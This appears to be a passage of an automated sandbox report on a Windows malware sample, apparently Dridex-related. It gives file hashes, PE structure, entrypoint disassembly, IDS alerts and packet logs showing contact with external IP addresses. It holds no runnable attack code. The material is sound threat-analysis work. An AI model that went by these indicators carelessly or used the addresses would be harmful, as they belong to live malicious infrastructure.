                                                                                                                                                                                                    Preview: ...R...ff......Q!..v.<,CX.$.Tog.pgS...N4....^.D..:..\OA},.....$70....f0.j.(..Z7.%.H.r.....,.D8NW..*}.|@z,..x_.3l*.......-.(..E...(iz.~.a(q9....*.MW...R.L.*.-....<u?..2...b .+I....2c.....W.....`b.%.^.-...Tk..*.P5.8...R.v.<.v.>Q.']...>..T....@>..Hg.7...!.X.b.Q.|C.1./8.c...#-mX....9..M..:..}.d..M.Y.T.d%...X...?...A...o.Vvz5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\bootTel.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                    Entropy (8bit):7.323938689727618
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:aw1DqjmCOCbdDfi8lWysVgOAeioMHFvc8uZPCkDgxo7iacd9ZbUCai75dExcii9a:VjCOCJDf2oewW6ogxo+Xd9ZQLXcii9a
                                                                                                                                                                                                    MD5:343A0703E2240362D39BB2CDF88759FB
                                                                                                                                                                                                    SHA1:73BF6168E04AB82274D473938B242453A9DE1953
                                                                                                                                                                                                    SHA-256:41F9133FA189CB091983638DF99F044A87F9E1214257E1C353454764729A504A
                                                                                                                                                                                                    SHA-512:CBCC0C249C2DAD087D28D299EF0B5253344B0D873CF26DBC8954CC883BAEBACEA6F82F860762287F782FF202EFD9A93D7C5E3426EEDB721EAF2B67824068EE82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...R...ff......Q!..v.<,CX.$.Tog.pgS...N4....^.D..:..\OA},.....$70....f0.j.(..Z7.%.H.r.....,.D8NW..*}.|@z,..x_.3l*.......-.(..E...(iz.~.a(q9....*.MW...R.L.*.-....<u?..2...b .+I....2c.....W.....`b.%.^.-...Tk..*.P5.8...R.v.<.v.>Q.']...>..T....@>..Hg.7...!.X.b.Q.|C.1./8.c...#-mX....9..M..:..}.d..M.Y.T.d%...X...?...A...o.Vvz5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.882339422942
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                    File name:Ln0LqSBLhS.exe
                                                                                                                                                                                                    File size:701952
                                                                                                                                                                                                    MD5:d600beac1e021639e589dd8cc6e428eb
                                                                                                                                                                                                    SHA1:d9e3e698d0a77905e6b577bbfdf1200a53f93af1
                                                                                                                                                                                                    SHA256:051a2902c6a41210cbf84e97a4d24b7f4538414c25433e2e75ad0b6c9f7bf481
                                                                                                                                                                                                    SHA512:2a83ec7b8076764808b9c32ac7648b8aae8fa3afb716876ca868b9bdc8191bc09ebe0b3c5a80d2e3c2a1871530d9a42e119aaa955cf0b246d9cd2a2ebac8f917
                                                                                                                                                                                                    SSDEEP:12288:eg4rSVzZAIILcX8pGoo1HH/aJ7Avy8DIx+qKLlvSrbHPRHncczx8AV9UzsVuOTnQ:egqiZAIILcwhgn/0A7m+T+rRHNxxusxT
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....oc^...

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:e0e0e8beb0e4c8ea

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x402233
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                    Time Stamp:0x5E636F8F [Sat Mar 7 09:55:27 2020 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:6af2f376c26d45636195772a4c22fdda

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007FBEC8CA051Ch
                                                                                                                                                                                                    jmp 00007FBEC8C9C33Dh
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                    cmp eax, dword ptr [004A00B0h+ecx*8]
                                                                                                                                                                                                    je 00007FBEC8C9C4D5h
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    cmp ecx, 2Dh
                                                                                                                                                                                                    jc 00007FBEC8C9C4B3h
                                                                                                                                                                                                    lea ecx, dword ptr [eax-13h]
                                                                                                                                                                                                    cmp ecx, 11h
                                                                                                                                                                                                    jnbe 00007FBEC8C9C4D0h
                                                                                                                                                                                                    push 0000000Dh
                                                                                                                                                                                                    pop eax
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov eax, dword ptr [004A00B4h+ecx*8]
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, FFFFFF44h
                                                                                                                                                                                                    push 0000000Eh
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                    sbb eax, eax
                                                                                                                                                                                                    and eax, ecx
                                                                                                                                                                                                    add eax, 08h
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    call 00007FBEC8C9F530h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007FBEC8C9C4C8h
                                                                                                                                                                                                    mov eax, 004A0218h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, 08h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    call 00007FBEC8C9F51Dh
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007FBEC8C9C4C8h
                                                                                                                                                                                                    mov eax, 004A021Ch
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, 0Ch
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    call 00007FBEC8C9C4A7h
                                                                                                                                                                                                    mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                    push ecx
                                                                                                                                                                                                    mov dword ptr [eax], ecx
                                                                                                                                                                                                    call 00007FBEC8C9C447h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                    call 00007FBEC8C9C481h
                                                                                                                                                                                                    mov dword ptr [eax], esi
                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                                                    je 00007FBEC8C9C4E6h
                                                                                                                                                                                                    mov al, byte ptr [ecx]
                                                                                                                                                                                                    add ecx, 01h
                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                    je 00007FBEC8C9C510h
                                                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                                                    jne 00007FBEC8C9C4B1h
                                                                                                                                                                                                    add eax, 00000000h
                                                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                    lea esp, dword ptr [eax+eax+00000000h]

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9f51c0x3c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x19ed0000xab40.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x9c2200x1c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x9de380x18.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9ddf00x40.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x1c8.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x9a4690x9a600False0.97729472419data7.98769447308IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x9c0000x3f900x4000False0.294006347656data4.54767403813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0xa00000x194c55c0x2000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0x19ed0000xab400xac00False0.653343023256data6.27594792906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                    RT_ICON0x19ed3f00x6c8data
                                                                                                                                                                                                    RT_ICON0x19edab80x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                    RT_ICON0x19ee0200x25a8data
                                                                                                                                                                                                    RT_ICON0x19f05c80x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                    RT_ICON0x19f0a700xea8data
                                                                                                                                                                                                    RT_ICON0x19f19180x8a8data
                                                                                                                                                                                                    RT_ICON0x19f21c00x6c8data
                                                                                                                                                                                                    RT_ICON0x19f28880x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                    RT_ICON0x19f2df00x25a8data
                                                                                                                                                                                                    RT_ICON0x19f53980x10a8data
                                                                                                                                                                                                    RT_ICON0x19f64400x988data
                                                                                                                                                                                                    RT_ICON0x19f6dc80x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                    RT_STRING0x19f74a00x2dcdata
                                                                                                                                                                                                    RT_STRING0x19f77800x3badata
                                                                                                                                                                                                    RT_ACCELERATOR0x19f72a80x40data
                                                                                                                                                                                                    RT_GROUP_ICON0x19f0a300x3edata
                                                                                                                                                                                                    RT_GROUP_ICON0x19f72300x76data
                                                                                                                                                                                                    RT_VERSION0x19f72e80x1b4data

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    KERNEL32.dlllstrlenA, GetConsoleAliasesLengthW, GetCPInfo, HeapAlloc, InterlockedIncrement, _lwrite, GetCurrentProcess, GetUserDefaultLCID, GetConsoleTitleA, GetUserDefaultLangID, GetEnvironmentStrings, GlobalAlloc, SetVolumeMountPointA, GetSystemWindowsDirectoryA, WriteConsoleOutputA, GetVersionExW, lstrcpynW, LocalReAlloc, HeapQueryInformation, ReadFile, GetModuleFileNameW, VerifyVersionInfoW, ChangeTimerQueueTimer, GetProcAddress, PeekConsoleInputW, GetComputerNameExW, VerLanguageNameA, CreateTimerQueueTimer, FreeUserPhysicalPages, BuildCommDCBW, GetLocalTime, LoadLibraryA, BeginUpdateResourceA, GetCurrentConsoleFont, WaitForMultipleObjects, SetEnvironmentVariableA, GetDefaultCommConfigA, GetConsoleTitleW, VirtualProtect, FindFirstVolumeA, ReadConsoleInputW, GetVersion, AddConsoleAliasA, EnumCalendarInfoExA, LCMapStringW, CreateThread, CreateFileA, SetStdHandle, GetCPInfoExW, GetCommandLineW, WriteConsoleW, GetConsoleOutputCP, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetLastError, HeapFree, TerminateProcess, IsDebuggerPresent, GetModuleHandleW, ExitProcess, GetCommandLineA, GetStartupInfoA, RtlUnwind, RaiseException, LCMapStringA, GetStringTypeW, WriteFile, GetStdHandle, GetModuleFileNameA, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA
                                                                                                                                                                                                    USER32.dllRealGetWindowClassA, GetCaretPos

                                                                                                                                                                                                    Version Infos

                                                                                                                                                                                                    DescriptionData
                                                                                                                                                                                                    InternalNamesagzmioloku.axi
                                                                                                                                                                                                    ProductVersion7.19.28.123
                                                                                                                                                                                                    CopyrightCopyrighz (C) 2021, fudkageta
                                                                                                                                                                                                    Translation0x0181 0x022e

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    08/30/21-10:14:18.155529TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    08/30/21-10:14:20.271484ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                                                                                                                    08/30/21-10:14:30.479751TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4971680192.168.2.394.190.187.102

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.074347973 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.114644051 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.114762068 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.134635925 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.175364017 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.175411940 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.175507069 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.175546885 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.177964926 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.177990913 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.178009987 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.178024054 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.178092003 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.178119898 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.246073008 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.289261103 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.289356947 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.308574915 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.352519035 CEST4434970877.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.352629900 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:15.999768972 CEST49708443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.236555099 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.284904003 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.285495043 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.305212021 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348140001 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348176956 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348198891 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348212004 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348232031 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348232985 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348249912 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348261118 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348295927 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.358175039 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.409343004 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.409998894 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.423419952 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.477926970 CEST4434970977.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.479491949 CEST49709443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.895025015 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.154690981 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.154906988 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.155529022 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.614638090 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.180355072 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.237674952 CEST804971194.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.241506100 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.268672943 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.268706083 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.297609091 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.299650908 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447382927 CEST804971194.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447496891 CEST804971194.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447500944 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447591066 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447642088 CEST4971180192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.503640890 CEST804971194.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557136059 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557179928 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557199001 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557223082 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557358980 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557384014 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.628809929 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.669245958 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.669394970 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.698868990 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.739928007 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.739952087 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.739965916 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.739981890 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.740128040 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.740149021 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.741482973 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.773545980 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.813958883 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814121008 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814438105 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814568996 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814577103 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814593077 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814620972 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814630985 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814646006 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814673901 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814687967 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814712048 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814732075 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814769030 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814888000 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.848448038 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.891684055 CEST4434971277.123.139.190192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.891946077 CEST49712443192.168.2.377.123.139.190
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071703911 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071738958 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071809053 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071835041 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071942091 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071965933 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.071990967 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072014093 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072040081 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072062016 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072083950 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072107077 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072129965 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072153091 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072175980 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072199106 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.072696924 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.076306105 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.329734087 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.329757929 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.329844952 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333671093 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333693981 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333710909 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333723068 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333734989 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333745956 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333758116 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333770037 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333782911 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.333794117 CEST8049710203.228.9.102192.168.2.3
